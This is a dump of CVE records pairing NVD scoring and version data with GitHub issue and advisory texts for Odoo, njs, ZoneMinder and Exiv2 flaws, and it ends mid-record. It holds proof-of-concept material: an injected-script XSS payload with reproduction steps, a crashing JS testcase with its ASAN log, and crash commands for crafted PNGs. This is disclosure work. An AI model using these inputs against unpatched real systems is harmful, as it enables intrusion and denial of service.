"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32513 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-13
The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Core
**Credits**: Stephane Bidoul (ACSONE SA)
**CVE ID**: [CVE-2018-14886](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14886)
## I. Background
The description of Odoo modules can be written in several formats, including
reStructuredText (RST) format. RST syntax provides a directive to include local
system files, as a way to reuse text components.
## II. Problem Description
The directive to include local system files is not deactivated by the module
description renderer.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Privileged user account required
**CVSS3 Score**: Medium :: 6.8
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)
An attacker with a privileged user account could craft a fake module
description in order to retrieve the content of local files that may contain
sensitive information.
This could be used to access the contents of Odoo configuration files and other
system files readable by the Odoo service, which could include sensitive data
such as passwords.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Attackers exploiting this vulnerability can only access files readable
by the system user executing Odoo. Sensitive files might therefore be
protected by using filesystem-level permissions to block access to the
Odoo user.
It is very hard to effectively secure a system in this manner, so
applying the patch or updating is strongly recommended.
Odoo Cloud servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 9b4dfd99783447fb2aec6028880805e5050a4655
- 10.0: 4c7e74f5e93a4832db8b8e15beb70a4aa90b2eee
- 11.0: 7fbf7e233ce9ca485ef89f90872042a0a247274e
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-13 (CVE-2018-14886) - The module-description renderer... | https://api.github.com/repos/odoo/odoo/issues/32513/comments | 0 | 2019-04-08T13:37:58Z | 2019-04-08T13:38:00Z | https://github.com/odoo/odoo/issues/32513 | 430,456,802 | 32,513 |
CVE-2018-14887 | 2019-06-28T18:15:10.613 | Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 4.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/commits/master"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32511"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32511 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-11
Improper Host header sanitization in the dbfilter routing component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows a remote attacker to deny access to the service and to disclose database names via a crafted request.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Odoo Framework
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14887](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14887)
## I. Background
System administrators can configure a database filter in their Odoo service,
in order to host multiple databases on the same Odoo server, and dynamically
assign each request to the right database.
This is set using the "dbfilter" config parameter, which can use regular
expressions patterns, and placeholders that will be replaced by the domain (%d)
and host (%h) of the request.
## II. Problem Description
The placeholders were not properly sanitized before being injected in the
final db_filter expression used for the dynamic assignation.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: Public
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H)
If the web server in front of the Odoo service is configured to allow arbitrary
domain names (VHosts), for example with a wildcard expression for subdomains, or
if the Odoo service is directly exposed to the internet, an attacker could craft
a request to cause a malicious db_filter evaluation.
This could be used to trigger:
- a leak of the names of available databases hosted on the same server, even
if database listing was disabled by the administrator
- a denial of service (via a voluntarily inefficient regular expression)
The specific configuration necessary to make this exploitable is considered very
rare and unlikely in practice.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
Only systems relying on db_filter with a %d or %h placeholder **and** a wildcard
virtual host in their web server (or directly exposing the Odoo service) are
vulnerable.
If that is your case, a workaround is to make sure you have properly setup a
web server in front of Odoo (e.g. nginx or Apache), and remove any wildcard
expression from virtual hosts configured in the web server. You can replace
those expressions with fixed host names, or with stricter expressions that only
allows alphanumeric characters.
Odoo Cloud servers were never vulnerable to this, as they do not use db_filter.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: afde870da4d2af0d9b40f907261d1ea5d48864d2
- 10.0: 4e4dd4dfa2b898c064df93199f882c3829574d44
- 11.0: 6d83f700144b29150050900430e8166d3d3345f7
- 11.0-ent, 10.0-ent and 9.0 (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-11 (CVE-2018-14887) - Improper Host header sanitizati... | https://api.github.com/repos/odoo/odoo/issues/32511/comments | 0 | 2019-04-08T13:37:52Z | 2019-04-08T13:37:55Z | https://github.com/odoo/odoo/issues/32511 | 430,456,748 | 32,511 |
CVE-2019-13067 | 2019-06-30T00:15:11.283 | njs through 0.3.3, used in NGINX, has a buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c. This issue occurs after the fix for CVE-2019-12207 is in place. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/183"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2A12AFA-F1E5-4E07-B86C-A6CC93CD2081",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/183 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | NJS version:
```
changeset: 1011:2fb43ddbce84
tag: tip
user: hongzhidao <[email protected]>
date: Mon Jun 10 22:23:56 2019 -0400
summary: Added property getter/setter support in Object.defineProperty().
```
JS Testcase:
```js
(new InternalError(new Object(), RegExp().source.replace((Object((ReferenceError()+{get: function () {
}}))||Object.isExtensible()), RegExp().source.replace((RegExp()||ignoreCase.startsWith()), function v0() {
}, Number(), Boolean(), Error(), TypeError(), Boolean(), Error(), Object(), 0)))+0)
```
ASAN log:
```
=================================================================
==3788==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5566629c2ab8 at pc 0x55666274915c bp 0x7ffefaee9990 sp 0x7ffefaee9980
READ of size 1 at 0x5566629c2ab8 thread T0
#0 0x55666274915b in nxt_utf8_decode nxt/nxt_utf8.c:72
#1 0x556662749796 in nxt_utf8_length nxt/nxt_utf8.c:271
#2 0x5566625d3857 in njs_string_replace_join njs/njs_string.c:3661
#3 0x5566625e40ee in njs_string_replace_regexp_join njs/njs_string.c:3280
#4 0x5566625e40ee in njs_string_replace_regexp njs/njs_string.c:3163
#5 0x5566625e40ee in njs_string_prototype_replace njs/njs_string.c:3058
#6 0x55666268dc13 in njs_function_native_call njs/njs_function.c:587
#7 0x5566625b0592 in njs_vmcode_continuation njs/njs_vm.c:2336
#8 0x5566625b0cb3 in njs_vmcode_interpreter njs/njs_vm.c:159
#9 0x5566625ab693 in njs_vm_start njs/njs.c:594
#10 0x55666258e8a9 in njs_process_script njs/njs_shell.c:772
#11 0x556662587cc8 in njs_process_file njs/njs_shell.c:621
#12 0x556662587cc8 in main njs/njs_shell.c:283
#13 0x7f67abf81b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#14 0x556662589db9 in _start (/home/build/njs/build/njs+0x2bdb9)
0x5566629c2ab8 is located 40 bytes to the left of global variable '__compound_literal.29' defined in 'njs/njs_object.c:2284:18' (0x5566629c2ae0) of size 56
0x5566629c2ab8 is located 0 bytes to the right of global variable '__compound_literal.30' defined in 'njs/njs_object.c:2292:18' (0x5566629c2a80) of size 56
SUMMARY: AddressSanitizer: global-buffer-overflow nxt/nxt_utf8.c:72 in nxt_utf8_decode
Shadow bytes around the buggy address:
0x0aad4c530500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aad4c530510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0aad4c530520: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
0x0aad4c530530: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9
0x0aad4c530540: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
=>0x0aad4c530550: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 00 00 00 00
0x0aad4c530560: 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
0x0aad4c530570: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
0x0aad4c530580: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
0x0aad4c530590: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
0x0aad4c5305a0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3788==ABORTING
```
Found by [fluff](https://github.com/Samsung/Fluff) | global-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72 | https://api.github.com/repos/nginx/njs/issues/183/comments | 5 | 2019-06-20T12:23:30Z | 2019-07-02T14:04:00Z | https://github.com/nginx/njs/issues/183 | 458,626,122 | 183 |
CVE-2019-13072 | 2019-06-30T02:15:09.163 | Stored XSS in the Filters page (Name field) in ZoneMinder 1.32.3 allows a malicious user to embed and execute JavaScript code in the browser of any user who navigates to this page. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ZoneMinder/zoneminder/issues/2642"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/47060"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ZoneMinder/zoneminder/issues/2642 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ZoneMinder",
"zoneminder"
] | - ZoneMinder version 1.32.3
- Installed from PPA (Ubuntu Xenial)
- Ubuntu 16.04 Xenial
The 'Filters' page in ZoneMinder 1.32.3 is vulnerable to stored cross site scripting due to improper input sanitation in the 'Name' field. This is the latest version available in the Ubuntu 16.04 PPA. Please see attached screenshots.
<img width="1423" alt="1" src="https://user-images.githubusercontent.com/7573003/59644743-e30ab480-9133-11e9-950c-93eab20fd308.png">
<img width="1434" alt="2" src="https://user-images.githubusercontent.com/7573003/59644744-e30ab480-9133-11e9-8d5f-bd3a68c01b59.png">
Steps to reproduce the behavior:
1. Go to the "Filters" page.
2. In the "Name" field paste in a javascript payload such as "<script>alert('Vulnerable')</script>"
3. Refresh the page to verify that the payload executes and remains stored through browser sessions.
Expected behavior:
The user input fields should be sanitized. Special characters should be limited or escaped to prevent injection of malicious code.
| Stored Cross Site Scripting - Filters | https://api.github.com/repos/ZoneMinder/zoneminder/issues/2642/comments | 5 | 2019-06-18T00:07:40Z | 2019-12-26T10:04:57Z | https://github.com/ZoneMinder/zoneminder/issues/2642 | 457,200,985 | 2,642 |
CVE-2019-13108 | 2019-06-30T23:15:09.970 | An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a zero value for iccOffset. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/789"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/Exiv2/exiv2/pull/794"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/789 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | There is a bug at [pngimage.cpp:469](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L469). If `iccOffset == 0`, which happens if `chunkLength == 0`, then Exiv2 crashes with a SIGSEGV.
Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)): ![poc1](https://user-images.githubusercontent.com/4358136/56672050-a24f6b80-66ad-11e9-86d9-f0af10b008c9.png). You can run the PoC like this:
```
$ exiv2 poc1.png
Segmentation fault (core dumped)
``` | SIGSEGV in PngImage::readMetadata() | https://api.github.com/repos/Exiv2/exiv2/issues/789/comments | 2 | 2019-04-24T15:24:45Z | 2019-07-01T08:58:12Z | https://github.com/Exiv2/exiv2/issues/789 | 436,761,517 | 789 |
CVE-2019-13109 | 2019-06-30T23:15:10.017 | An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a chunkLength - iccOffset subtraction. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/790"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/Exiv2/exiv2/pull/795"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/790 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | This issue is closely related to #789, but the consequences of this bug are different. The calculation of `chunkLength - iccOffset` at [pngimage.cpp:472](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L472) can have a negative integer overflow which leads to an 8GB memory allocation in `zlibToDataBuf`. Also, the zlib decompression is run on uninitialized memory beyond the end of the buffer, so there is a potential info leak vulnerability here.
Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)): ![poc2](https://user-images.githubusercontent.com/4358136/56672813-fb6bcf00-66ae-11e9-9f14-6af4a90257c0.png). The simplest way to see the bug is to use `ulimit` to reduce the amount of available memory to less than 8GB:
```
$ ulimit -v 8000000
$ exiv2 poc2.png
Uncaught exception: std::bad_alloc
``` | Integer overflow, leading to very large allocation in PngImage::readMetadata() | https://api.github.com/repos/Exiv2/exiv2/issues/790/comments | 1 | 2019-04-24T15:39:42Z | 2019-07-01T09:01:35Z | https://github.com/Exiv2/exiv2/issues/790 | 436,769,374 | 790 |
CVE-2019-13110 | 2019-06-30T23:15:10.067 | A CiffDirectory::readDirectory integer overflow and out-of-bounds read in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted CRW image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/843"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/pull/844"
},
{
